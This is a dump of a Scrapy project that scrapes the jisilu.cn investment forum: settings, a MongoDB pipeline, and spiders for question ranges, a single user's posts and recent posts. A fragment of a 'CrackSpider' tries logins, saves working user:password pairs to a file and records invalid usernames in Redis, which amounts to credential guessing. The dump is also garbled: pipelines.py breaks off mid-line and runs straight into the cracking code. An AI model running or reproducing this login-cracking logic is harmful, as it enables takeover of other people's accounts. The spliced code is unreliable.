38 | #CONCURRENT_REQUESTS_PER_IP = 16
39 |
40 | # Disable cookies (enabled by default)
41 | COOKIES_ENABLED = True
42 |
43 | # Disable Telnet Console (enabled by default)
44 | #TELNETCONSOLE_ENABLED = False
45 |
46 | # Override the default request headers:
47 | #DEFAULT_REQUEST_HEADERS = {
48 | # 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
49 | # 'Accept-Language': 'en',
50 | #}
51 |
52 | # Enable or disable spider middlewares
53 | # See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
54 | #SPIDER_MIDDLEWARES = {
55 | # 'jsl.middlewares.JslSpiderMiddleware': 543,
56 | #}
57 |
58 | # Enable or disable downloader middlewares
59 | # See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
60 | # DOWNLOADER_MIDDLEWARES = {
61 | # 'jsl.middlewares.MyCustomDownloaderMiddleware': 543,
62 | # }
63 |
64 | # Enable or disable extensions
65 | # See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
66 | #EXTENSIONS = {
67 | # 'scrapy.extensions.telnet.TelnetConsole': None,
68 | #}
69 |
70 | # Configure item pipelines
71 | # See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
72 | ITEM_PIPELINES = {
73 | # 'jsl.pipelines.ElasticPipeline': 300,
74 | 'jsl.pipelines.JslPipeline':300,
75 | # 'scrapyelasticsearch.scrapyelasticsearch.ElasticSearchPipeline':200,
76 | }
77 |
78 | # Enable and configure the AutoThrottle extension (disabled by default)
79 | # See http://doc.scrapy.org/en/latest/topics/autothrottle.html
80 | #AUTOTHROTTLE_ENABLED = True
81 | # The initial download delay
82 | #AUTOTHROTTLE_START_DELAY = 5
83 | # The maximum download delay to be set in case of high latencies
84 | #AUTOTHROTTLE_MAX_DELAY = 60
85 | # The average number of requests Scrapy should be sending in parallel to
86 | # each remote server
87 | #AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
88 | # Enable showing throttling stats for every response received:
89 | #AUTOTHROTTLE_DEBUG = False
90 |
91 | # Enable and configure HTTP caching (disabled by default)
92 | # See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
93 | #HTTPCACHE_ENABLED = True
94 | #HTTPCACHE_EXPIRATION_SECS = 0
95 | #HTTPCACHE_DIR = 'httpcache'
96 | #HTTPCACHE_IGNORE_HTTP_CODES = []
97 | #HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
98 |
99 | ELASTICSEARCH_SERVERS = ['10.18.6.102:9200']
100 | ELASTICSEARCH_INDEX='jsl_elastic'
101 | ELASTICSEARCH_TYPE='ticket'
102 |
--------------------------------------------------------------------------------
/jsl/pipelines.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Define your item pipelines here
4 | #
5 | # Don't forget to add your pipeline to the ITEM_PIPELINES setting
6 | # See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
7 | import datetime
8 | import logging
9 |
10 | import pymongo
11 | from collections import OrderedDict
12 | from scrapy.exporters import JsonLinesItemExporter
13 | from jsl.items import Relationship, JslItem
14 | from jsl import config
15 |
16 |
17 | class JslPipeline(object):
18 |
19 | def __init__(self):
20 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}'
21 | self.db = pymongo.MongoClient(connect_uri)
22 |         # self.user = u'neo牛3'  # change to the target username, e.g. 毛之川; find the user id in the profile page source (e.g. 持有封基 is 8132)
23 | # self.collection = self.db['db_parker']['jsl_20181108_allQuestion_test']
24 | self.collection = self.db['db_parker'][config.doc_name]
25 | self.relations = self.db['db_parker']['jsl_relationship']
26 | try:
27 |             self.collection.create_index('question_id', unique=True)
28 | except Exception as e:
29 | pass
30 |
31 | def process_item(self, item, spider):
32 |
33 | if isinstance(item, JslItem):
34 | update_time = datetime.datetime.now()
35 | item = dict(item)
36 | item['update_time'] = update_time
37 |
38 |
39 | if self.collection.find_one({'question_id': item['question_id']},{'_id':1}):
40 |             # update the reply section; bail out if there is nothing to update
41 | only_add = False
42 |
43 | try:
44 | only_add = item['only_add']
45 |
46 | except Exception as e:
47 | pass
48 |
49 | if not only_add:
50 | resp_no = self.collection.find_one({'question_id': item['question_id']},{'resp_no':1})
51 | resp_no_num = resp_no.get('resp_no')
52 |
53 | if resp_no_num- ', user)
149 | logger.info('password==>', password)
150 | with open('find.txt','a') as f:
151 | f.write(f'{user}:{password}')
152 | if js_data.get('err','')=='用户名或口令无效':
153 | print('无效,入redis')
154 | self.__redis.sadd('username_run',user)
155 |
156 | if __name__ == '__main__':
157 | spider = CrackSpider()
158 | spider.run()
159 |
--------------------------------------------------------------------------------
/jsl/spiders/questions_loop.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import re
3 | import scrapy
4 | from scrapy import Request, FormRequest
5 | from jsl.items import JslItem
6 | from jsl import config
7 | import logging
8 |
9 | LASTEST_ID = config.LASTEST_ID # 394716
10 |
11 |
12 | # Walk all question ids (counting down) to find where to start
13 | class AllcontentSpider(scrapy.Spider):
14 | name = 'questions_loop'
15 |
16 | headers = {
17 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
18 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
19 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
20 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
21 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
22 | 'Referer': 'https://www.jisilu.cn/login/',
23 | 'Accept-Encoding': 'gzip,deflate,br',
24 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
25 | }
26 |
27 | def start_requests(self):
28 | login_url = 'https://www.jisilu.cn/login/'
29 | headers = {
30 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
31 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8',
32 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive',
33 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/',
34 | 'Upgrade-Insecure-Requests': '1',
35 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'}
36 |
37 | yield Request(url=login_url, headers=headers, callback=self.login, dont_filter=True)
38 |
39 | def login(self, response):
40 | url = 'https://www.jisilu.cn/account/ajax/login_process/'
41 | data = {
42 | 'return_url': 'https://www.jisilu.cn/',
43 | 'user_name': config.jsl_user,
44 | 'password': config.jsl_password,
45 | 'net_auto_login': '1',
46 | '_post_type': 'ajax',
47 | }
48 |
49 | yield FormRequest(
50 | url=url,
51 | headers=self.headers,
52 | formdata=data,
53 | callback=self.parse_,
54 | )
55 |
56 | def parse_(self, response):
57 | print(response.text)
58 | start_page = LASTEST_ID
59 |
60 | focus_url = 'https://www.jisilu.cn/question/{}'.format(start_page)
61 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_item, meta={'question_id': start_page, 'dont_redirect': True,},
62 | dont_filter=True)
63 |
64 | def parse_item(self, response):
65 | question_id_ = response.meta['question_id']
66 |
67 | if '问题不存在或已被删除' in response.text:
68 | question_id = question_id_ - 1
69 | if question_id>1:
70 | focus_url = 'https://www.jisilu.cn/question/{}'.format(question_id)
71 |
72 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_item,
73 | meta={'question_id': question_id, 'dont_redirect': True,}, dont_filter=True)
74 |
75 | else:
76 |
77 | question_id = question_id_ - 1
78 | print(question_id)
79 | if question_id > 1:
80 | focus_url = 'https://www.jisilu.cn/question/{}'.format(question_id)
81 |
82 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_item,
83 | meta={'question_id': question_id, 'dont_redirect': True,}, dont_filter=True)
84 |
85 |
86 | item = JslItem()
87 |
88 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
89 | s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
90 |
91 | if s:
92 | ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
93 | else:
94 | ret = None
95 |
96 | try:
97 | content = ret[0].strip()
98 | except:
99 | content = None
100 |
101 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first()
102 |
103 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')
104 |
105 | url = response.url
106 |
107 | # 添加发起人
108 | try:
109 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first()
110 | except Exception as e:
111 | print(e)
112 | item['creator'] = None
113 | try:
114 | item['title'] = title.strip()
115 | except Exception as e:
116 | item['title']=None
117 | item['content'] = content
118 |
119 | if resp_no is None:
120 | resp_no = 0
121 | # try:
122 | # item['resp_no'] = int(resp_no)
123 | # except Exception as e:
124 | # logging.warning(e)
125 | # logging.warning('没有回复')
126 | # item['resp_no'] = None
127 | item['only_add'] = True
128 | item['resp_no'] = int(resp_no)
129 | item['question_id'] = question_id_
130 | createTime = createTime.strip()
131 | if not re.search('^\d', createTime):
132 | createTime = createTime.replace('发表时间 ', '')
133 | # createTime = None
134 | # self.logger.error('创建日期有误:{}'.format(url))
135 | if not re.match('\d{4}-\d{2}-\d{2} \d{2}:\d{2}', createTime):
136 | self.logger.error('创建日期有误:{}'.format(url))
137 | self.logger.error(createTime)
138 | createTime = None
139 | #
140 | item['createTime'] = createTime
141 | item['url'] = url.strip()
142 | resp = []
143 | last_resp_date = None
144 | for index, reply in enumerate(
145 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
146 | replay_user = reply.xpath('.//div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
147 |
148 | if last_resp_date is None:
149 | last_resp_date = reply.xpath('.//div[@class="aw-dynamic-topic-meta"]/span/text()').extract_first()
150 |
151 | rep_content = reply.xpath(
152 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]/text()').extract_first()
153 | # print rep_content
154 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
155 | try:
156 | int(agree)
157 | except:
158 | agree = 0
159 |
160 | resp.append({replay_user.strip() + '_{}'.format(index): [int(agree), rep_content.strip()]})
161 |
162 | item['resp'] = resp
163 | item['last_resp_date'] = last_resp_date
164 |
165 | yield item
166 |
167 |
--------------------------------------------------------------------------------
/jsl/spiders/jisilu_user_content.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import datetime
3 | import logging
4 | import re
5 | import scrapy
6 | from jsl.items import JslItem
7 | from jsl import config
8 | from jsl.spiders.aes_encode import decoder
9 | from scrapy import Request,FormRequest
10 | # Fetch all posts of a given user, mainly as a quick backup in case a big-name user deletes their posts
11 |
12 | class JisiluSpider(scrapy.Spider):
13 | name = 'single_user'
14 | DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC'
15 | MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}'
16 |
17 | def __init__(self):
18 | super(JisiluSpider,self).__init__()
19 |
20 | self.headers = {
21 | 'Accept-Language': ' zh-CN,zh;q=0.9', 'Accept-Encoding': ' gzip, deflate, br',
22 | 'X-Requested-With': ' XMLHttpRequest', 'Host': ' www.jisilu.cn', 'Accept': ' */*',
23 | 'User-Agent': ' Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36',
24 | 'Connection': ' keep-alive',
25 | 'Pragma': ' no-cache', 'Cache-Control': ' no-cache',
26 | 'Referer': ' https://www.jisilu.cn/people/dbwolf'
27 | }
28 |
29 |         # self.uid = '83220'  # this id has to be looked up in the profile page source
30 | self.uid = config.uid
31 |
32 | self.list_url = 'https://www.jisilu.cn/people/ajax/user_actions/uid-{}__actions-101__page-{}'
33 |
34 |
35 | def start_requests(self):
36 |
37 | login_url = 'https://www.jisilu.cn/login/'
38 | headersx = {
39 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
40 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8',
41 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive',
42 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/',
43 | 'Upgrade-Insecure-Requests': '1',
44 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'}
45 |
46 | yield Request(url=login_url, headers=headersx, callback=self.login, dont_filter=True)
47 |
48 | def login(self, response):
49 | url = 'https://www.jisilu.cn/account/ajax/login_process/'
50 | username = decoder(config.jsl_user)
51 | jsl_password = decoder(config.jsl_password)
52 | data = {
53 | 'return_url': 'https://www.jisilu.cn/',
54 | 'user_name': username,
55 | 'password': jsl_password,
56 | 'net_auto_login': '1',
57 | '_post_type': 'ajax',
58 | }
59 |
60 | yield FormRequest(
61 | url=url,
62 | headers=self.headers,
63 | formdata=data,
64 | callback=self.start_fetch_user,
65 | dont_filter=True,
66 |
67 | )
68 |
69 |
70 | def start_fetch_user(self,response):
71 | current_page=0
72 | yield scrapy.Request(self.list_url.format(self.uid,current_page),headers=self.headers,meta={'current_page':current_page},callback=self.parse)
73 |
74 | def parse(self, response,**kwargs):
75 | current_page = response.meta['current_page']
76 | link_list = response.xpath('//body/div[@class="aw-item"]')
77 |         if not link_list:
78 | return
79 |
80 | for link in link_list:
81 | link_=link.xpath('.//div[@class="aw-mod"]/div[@class="aw-mod-head"]/h4/a/@href').extract_first()
82 | match = re.search('/question/(\d+)',link_)
83 | if match:
84 | question_id = match.group(1)
85 | yield scrapy.Request(self.DETAIL_URL.format(question_id),
86 | headers=self.headers,
87 |                                       callback=self.check_detail,
88 | meta={'question_id':question_id})
89 |
90 | current_page=current_page+1
91 | yield scrapy.Request(self.list_url.format(self.uid,current_page),headers=self.headers,meta={'current_page':current_page},callback=self.parse)
92 |
93 |
94 | def check_detail(self,response,**kwargs):
95 |
96 | if '您访问的资源需要购买会员' in response.text:
97 | return
98 |
99 | question_id = response.meta['question_id']
100 | more_page = response.xpath('//div[@class="pagination pull-right"]')
101 |
102 | item = JslItem()
103 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
104 | s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
105 |         ret = re.findall('(.*?)\.donate_user_avatar', s, re.S) if s else []
106 | item['question_id'] = question_id
107 |
108 | try:
109 | content = ret[0].strip()
110 | except Exception as e:
111 | logging.error(e)
112 | content = None
113 |
114 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first()
115 | # 'aw-question-detail-meta'
116 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')
117 |
118 | url = response.url
119 |
120 | # 添加发起人
121 | try:
122 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first()
123 | except Exception as e:
124 | logging.error(e)
125 | item['creator'] = None
126 |
127 | item['title'] = title.strip()
128 | item['content'] = content
129 | try:
130 | item['resp_no'] = int(resp_no)
131 | except Exception as e:
132 | # logging.warning('没有回复')
133 | item['resp_no'] = 0
134 |
135 | item['createTime'] = createTime.replace('发表时间 ', '')
136 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
137 | item['url'] = url.strip()
138 | # item['html'] = response.text
139 | # item['last_resp_date'] = response.meta['last_resp_date']
140 |
141 | # 多页
142 | if more_page:
143 |
144 | total_resp_no = item['resp_no']
145 | total_page = total_resp_no // 100 + 1
146 | item['resp'] = []
147 |
148 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers,
149 | callback=self.multi_page_detail,
150 | meta={'question_id': question_id, 'page': 1, 'total_page': total_page,
151 | 'item': item})
152 |
153 | else:
154 |
155 | resp_ = []
156 | # 回复内容
157 | resp_time_list = []
158 | for index, reply in enumerate(
159 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
160 | replay_user = reply.xpath(
161 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
162 | rep_content = reply.xpath(
163 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
164 | 'string(.)').extract_first()
165 |
166 |                 # note: this field was added for the initial per-user collection run
167 | rep_time = reply.xpath('.//div[@class="pull-left aw-dynamic-topic-content"]//div[@class="aw-dynamic-topic-meta"]/span/text()').extract_first()
168 | resp_time_list.append(rep_time)
169 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
170 | if agree is None:
171 | agree = 0
172 | else:
173 | agree = int(agree)
174 |
175 | resp_.append(
176 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
177 | if len(resp_time_list)>0:
178 | resp_time = resp_time_list[0]
179 | else:
180 | resp_time=None
181 | item['resp'] = resp_
182 | item['last_resp_date']=resp_time
183 |
184 | yield item
185 |
186 | # 详情页
187 | def multi_page_detail(self, response):
188 |
189 | current_page = response.meta['page']
190 | item = response.meta['item']
191 | total_page = response.meta['total_page']
192 | question_id = response.meta['question_id']
193 |
194 | resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div')
195 |
196 | for index, reply in enumerate(
197 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
198 | replay_user = reply.xpath(
199 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
200 | rep_content = reply.xpath(
201 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
202 | 'string(.)').extract_first()
203 | if rep_content:
204 | rep_content = rep_content.strip()
205 | # rep_content = '\n'.join(rep_content)
206 |
207 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
208 | if agree is None:
209 | agree = 0
210 | else:
211 | agree = int(agree)
212 |
213 | item['resp'].append(
214 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
215 |
216 | current_page += 1
217 |
218 | if current_page <= total_page:
219 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers,
220 | callback=self.multi_page_detail,
221 | meta={'question_id': question_id, 'page': current_page, 'total_page': total_page,
222 | 'item': item})
223 | else:
224 | yield item
--------------------------------------------------------------------------------
/jsl/spiders/weekly_content.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import datetime
3 | import re
4 | import scrapy
5 | from scrapy import Request, FormRequest
6 | from jsl.items import JslItem
7 | from jsl import config
8 | import logging
9 | from jsl.spiders.aes_encode import decoder
10 | import pymongo
11 |
12 | # Crawl by date; new-member posts may be missed
13 |
14 | class WeekContentSpider(scrapy.Spider):
15 | name = 'week_content'
16 |
17 | headers = {
18 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
19 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
20 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
21 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
22 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
23 | 'Referer': 'https://www.jisilu.cn/login/',
24 | 'Accept-Encoding': 'gzip,deflate,br',
25 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
26 | }
27 |
28 | start_page = 1
29 |
30 | POST_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-add_time__category-__day-0__is_recommend-__page-{}' # 发帖日期
31 | RESP_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-new__category-__day-0__is_recommend-__page-{}' # 回帖按照日期
32 | DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC'
33 | MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}'
34 |
35 | def __init__(self, daily='yes', *args, **kwargs):
36 | super().__init__(*args, **kwargs)
37 |
38 | if daily == 'yes':
39 |
40 | self.logger.info('按照周')
41 |             self.DAYS = 14  # look back this many days
42 | self.URL = self.POST_DATE_URL
43 |
44 | self.last_week = datetime.datetime.now() + datetime.timedelta(days=-1 * self.DAYS)
45 |
46 |
47 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}'
48 | self.db = pymongo.MongoClient(connect_uri)
49 |         # self.user = u'neo牛3'  # change to the target username, e.g. 毛之川; find the user id in the profile page source (e.g. 持有封基 is 8132)
50 | self.collection = self.db['db_parker'][config.doc_name]
51 |
52 | def start_requests(self):
53 |
54 | login_url = 'https://www.jisilu.cn/login/'
55 | headersx = {
56 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
57 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8',
58 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive',
59 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/',
60 | 'Upgrade-Insecure-Requests': '1',
61 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'}
62 |
63 | yield Request(url=login_url, headers=headersx, callback=self.login, dont_filter=True)
64 |
65 | def login(self, response):
66 | url = 'https://www.jisilu.cn/account/ajax/login_process/'
67 | username = decoder(config.jsl_user)
68 | jsl_password = decoder(config.jsl_password)
69 | data = {
70 | 'return_url': 'https://www.jisilu.cn/',
71 | 'user_name': username,
72 | 'password': jsl_password,
73 | 'net_auto_login': '1',
74 | '_post_type': 'ajax',
75 | }
76 |
77 | yield FormRequest(
78 | url=url,
79 | headers=self.headers,
80 | formdata=data,
81 | callback=self.parse,
82 | dont_filter=True
83 | )
84 |
85 | def parse(self, response, **kwargs):
86 | print('登录后', response.text)
87 | focus_url = self.URL.format(self.start_page)
88 |
89 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_page, dont_filter=True,
90 | meta={'page': self.start_page})
91 |
92 | def parse_page(self, response):
93 |
94 | current_page = response.meta['page']
95 |
96 | nodes = response.xpath('//div[@class="aw-question-list"]/div')
97 | last_resp_date = None
98 |
99 | for node in nodes:
100 |
101 | each_url = node.xpath('.//h4/a/@href').extract_first()
102 | try:
103 | last_resp_date = node.xpath('.//div[@class="aw-questoin-content"]/span/text()').extract()[-1].strip()
104 | # '回复 • 2018-12-10 09:49 • 46335 次浏览'
105 | last_resp_date = re.search('• (.*?) •', last_resp_date).group(1)
106 | except:
107 | logging.error('failed to find date')
108 | continue
109 | else:
110 | # 访问详情
111 | # 替换成这个 'https://www.jisilu.cn/question/320215&sort_key=agree_count&sort=DESC'
112 | # '"https://www.jisilu.cn/question/336326"'
113 | if re.search('www.jisilu.cn/question/\d+', each_url):
114 | question_id = re.search('www\.jisilu\.cn/question/(\d+)', each_url).group(1)
115 |
116 | # if self.question_exist(question_id):
117 | # continue
118 |
119 | # print(f'{question_id}帖子不存在,下载')
120 |
121 | last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M')
122 | yield Request(url=self.DETAIL_URL.format(question_id), headers=self.headers,
123 | callback=self.check_detail,
124 | meta={'last_resp_date': last_resp_date, 'question_id': question_id})
125 |
126 | # 继续翻页
127 | # print(last_resp_date)
128 | if last_resp_date is not None and isinstance(last_resp_date,str):
129 | last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M')
130 |
131 | if last_resp_date is not None and (self.last_week < last_resp_date):
132 | # logging.info('last_resp_date ===== {}'.format(last_resp_date))
133 |
134 | current_page += 1
135 | yield Request(url=self.URL.format(current_page), headers=self.headers, callback=self.parse_page,
136 | meta={'page': current_page})
137 |
138 | def question_exist(self,_id):
139 | return True if self.collection.find_one({'question_id':_id},{'_id':1}) else False
140 |
141 | def compose_content(self,content_list):
142 | string = ""
143 | for line in content_list:
144 | line = line.strip()
145 | if len(line)>0:
146 | string+=line+'\n'
147 | return string
148 |
149 | def check_detail(self, response):
150 |
151 | if '您访问的资源需要购买会员' in response.text:
152 | return
153 |
154 | question_id = response.meta['question_id']
155 | last_resp_date=response.meta['last_resp_date']
156 | more_page = response.xpath('//div[@class="pagination pull-right"]')
157 |
158 | item = JslItem()
159 | item['last_resp_date'] = last_resp_date
160 |
161 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
162 | item['question_id'] = question_id
163 | content_node = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]')
164 |
165 | content_html = content_node.extract_first() # 获取到源码
166 |
167 | # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
168 | # ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
169 | # try:
170 | # content = ret[0].strip()
171 | # except Exception as e:
172 | # # logging.error(e)
173 | # content = None
174 |
175 | content_list = content_node.xpath('string(.)').extract()
176 | content_str = self.compose_content(content_list)
177 |
178 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first()
179 | # 'aw-question-detail-meta'
180 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')
181 |
182 | url = response.url
183 |
184 | # 添加发起人
185 | try:
186 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first()
187 | except Exception as e:
188 | # logging.error(e)
189 | item['creator'] = None
190 |
191 | item['title'] = title.strip()
192 | item['content'] = content_str
193 | item['content_html'] = content_html
194 |
195 | try:
196 | item['resp_no'] = int(resp_no)
197 | except Exception as e:
198 | # logging.warning('没有回复')
199 | item['resp_no'] = 0
200 | if createTime is None:
201 | # print(title)
202 | # print(content)
203 | return
204 | item['createTime'] = createTime.replace('发表时间 ', '')
205 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
206 | item['url'] = url.strip().replace('&sort_key=agree_count&sort=DESC','')
207 |
208 | # 多页
209 | if more_page:
210 |
211 | total_resp_no = item['resp_no']
212 | total_page = total_resp_no // 100 + 1
213 | item['resp'] = []
214 |
215 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers,
216 | callback=self.multi_page_detail,
217 | meta={'question_id': question_id, 'page': 1, 'total_page': total_page,
218 | 'item': item})
219 |
220 | else:
221 |
222 | resp_ = []
223 |             # reply content
224 | for index, reply in enumerate(
225 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
226 | replay_user = reply.xpath(
227 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
228 | rep_content = reply.xpath(
229 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
230 | 'string(.)').extract_first()
231 | # rep_content = '\n'.join(rep_content)
232 |
233 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
234 | if agree is None:
235 | agree = 0
236 | else:
237 | agree = int(agree)
238 |
239 | resp_.append(
240 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
241 |
242 | item['resp'] = resp_
243 | yield item
244 |
245 |     # reply detail pages
246 | def multi_page_detail(self, response):
247 |
248 | current_page = response.meta['page']
249 | item = response.meta['item']
250 | total_page = response.meta['total_page']
251 | question_id = response.meta['question_id']
252 |
253 | resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div')
254 |
255 | for index, reply in enumerate(
256 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
257 | replay_user = reply.xpath(
258 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
259 | rep_content = reply.xpath(
260 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
261 | 'string(.)').extract_first()
262 | if rep_content:
263 | rep_content = rep_content.strip()
264 |
265 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
266 | if agree is None:
267 | agree = 0
268 | else:
269 | agree = int(agree)
270 |
271 | item['resp'].append(
272 |                 {replay_user.strip(): {'agree': agree, 'resp_content': rep_content}})
273 |
274 | current_page += 1
275 |
276 | if current_page <= total_page:
277 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers,
278 | callback=self.multi_page_detail,
279 | meta={'question_id': question_id, 'page': current_page, 'total_page': total_page,
280 | 'item': item})
281 | else:
282 | yield item
283 |
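284 |
285 | # A minimal sketch of the pagination rule used in check_detail() above: the
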